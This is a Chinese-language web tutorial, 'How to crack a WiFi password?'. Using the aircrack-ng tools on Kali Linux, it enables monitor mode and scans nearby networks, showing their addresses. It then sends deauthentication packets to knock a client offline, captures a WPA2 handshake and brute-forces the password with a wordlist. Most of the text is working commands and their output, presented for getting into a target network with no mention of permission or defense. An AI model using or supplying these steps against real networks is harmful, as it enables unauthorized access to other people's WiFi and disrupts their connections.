如何破解wifi密码?
阅读原文时间:2023年08月09日阅读:9

前期准备:

  kali 系统

  外置无线网卡

破解过程:

  首先,需要登录kali系统,可以是虚拟机。

  在虚拟机中设置点击 虚拟机-可移动设备-无线网卡的名称,将无线网卡绑定到kali虚拟机上。

  在kali中切换到root账户:sudo su root

  使用命令:ifconfig 查看无线网卡是否正常接入:一般会回显wlan0,记住这个wlan0 网卡名称

┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163 mtu 1500
ether 00:0c:29:4f:04:de txqueuelen 1000 (Ethernet)
RX packets 5401114 bytes 708741419 (675.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4868778 bytes 457372067 (436.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 37851 bytes 14126452 (13.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37851 bytes 14126452 (13.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0: flags=4099 mtu 1500
ether 06:8a:73:6a:51:48 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

  使用命令:airmon-ng 查看网卡是否支持监听功能:有回显说明支持监听功能。

┌──(rootkali)-[/home/kali/Desktop]
└─# airmon-ng

PHY Interface Driver Chipset

phy4 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070

  使用命令:airmon-ng start wlan0 激活无线网卡的监听模式

┌──(rootkali)-[/home/kali/Desktop]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name  
531 NetworkManager  

969681 wpa_supplicant

PHY Interface Driver Chipset

phy4 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy4]wlan0 on [phy4]wlan0mon)
(mac80211 station mode vif disabled for [phy4]wlan0)

  返回enabled说明已经激活,这时使用ifconfig命令再次查看无线网卡,可能会发现无线网卡名称变为wlan0mon

┌──(rootkali)-[/home/kali/Desktop]
└─# ifconfig
eth0: flags=4163 mtu 1500
ether 00:0c:29:4f:04:de txqueuelen 1000 (Ethernet)
RX packets 5401114 bytes 708741419 (675.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4868778 bytes 457372067 (436.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 37851 bytes 14126452 (13.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37851 bytes 14126452 (13.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0mon: flags=4163 mtu 1500
unspec C8-3A-35-CE-82-22-00-8C-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

  使用命令:airodump-ng wlan0mon 扫描当前周边环境的WiFi信号,这里的wlan0mon是当前无线网卡的网卡名称,具体名称需要自行更换。如何扫不出来,请插拔一下无线网卡,再次使用命

  令:airmon-ng start wlan0以及airodump-ng wlan0mon。

CH 5 ][ Elapsed: 6 s ][ 2023-01-20 21:23

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

5A:41:20:A3:5E:D9 -70 2 0 0 1 540 WPA2 CCMP PSK
74:85:C4:5A:8E:2D -56 2 0 0 6 270 WPA2 CCMP PSK scivous
D6:B7:09:B2:D5:4E -65 4 0 0 3 360 WPA2 CCMP PSK
50:78:B3:61:04:60 -67 2 0 0 4 130 WPA2 CCMP PSK ChinaNet-x5cZ
48:73:97:01:2C:46 -64 2 0 0 9 130 OPN
C8:6C:20:46:E6:AC -72 2 0 0 4 130 WPA2 CCMP PSK ChinaNet-5Zzh
48:73:97:01:2C:47 -73 2 0 0 9 130 WPA2 CCMP PSK ChinaNet-2.4G-2C45
F0:55:01:F3:EF:75 -75 2 0 0 11 360 WPA2 CCMP PSK ChinaNet-G64JFP_Wi-Fi5

BSSID STATION PWR Rate Lost Frames Notes Probes

(not associated) 34:EA:34:9C:A1:F9 -74 0 - 1 15 2 ChinaNet-q97E
C8:3A:35:06:11:08 16:1E:8A:6F:A0:15 -1 11e- 0 0 3
Quitting…

  找到需要破解的wifi名称ESSID这一栏:比如scivous,记录这个mac地址(74:85:C4:5A:8E:2D)以及CH号(6)。CH表示无线网络信道,BSSID表示无线 AP 的硬件地址。

  找到之后,即可CRTL+D结束运行。

  下面开始抓包:

  使用命令:airodump-ng -c 6 --bssid 74:85:C4:5A:8E:2D -w /home/kali/Desktop/data wlan0mon

  这里的6是指CH号,bssid是指bssid号,-w后面写入要保存的文件地址以及对应的文件名称,wlan0mon是指网卡名称。

CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

74:85:C4:5A:8E:2D -66 38 48 85 15 6 270 WPA2 CCMP PSK H3C_1703

BSSID STATION PWR Rate Lost Frames Notes Probes

74:85:C4:5A:8E:2D E4:93:6A:CB:87:39 -46 0 - 1e 1114 22
74:85:C4:5A:8E:2D 64:61:40:F4:47:6D -48 1e- 1e 1430 74

  出现这个界面,说明已经开始抓包了。如果没有出现,继续插拔无线网卡,按照之前的操作在来一遍。

  抓包过程可能比较慢,这时可以进行ack攻击,加快抓包进程,这时不要关闭抓包,打开新的terminal,使用命令:

  aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon

  这里的10代表攻击10次,-a为bssid号,-c为station号(用户硬件设备地址)。

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon 1 ⨯
[sudo] password for kali:
21:50:17 Waiting for beacon frame (BSSID: 74:85:C4:5A:8E:2D) on channel 6
21:50:18 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [24|49 ACKs]
21:50:18 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [47|31 ACKs]
21:50:19 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [11|40 ACKs]
21:50:20 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 8|45 ACKs]
21:50:20 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 5|38 ACKs]

  查看抓包界面, CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41后面是否出现][ WPA handshake: 74:85:C4:5A:8E:2D,这时,就代表已经抓到了包,在相应的位置会新生成5个文件,找到cap结尾的

  文件:

  

暴力破解:

  使用wifi字典对data-01.cap进行hash暴力破解:这里的破解可以离线破解了,不需要联网。

  使用命令:aircrack-ng -w /home/kali/Desktop/password.txt -b 74:85:C4:5A:8E:2D /home/kali/Desktop/data-01.cap

  字典文件可以参考:https://github.com/conwnet/wpa-dictionary,https://www.freedidi.com/2503.html,也可以自己自行收集。

  破解成功之后,使用相应的密码,登录wifi即可。

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章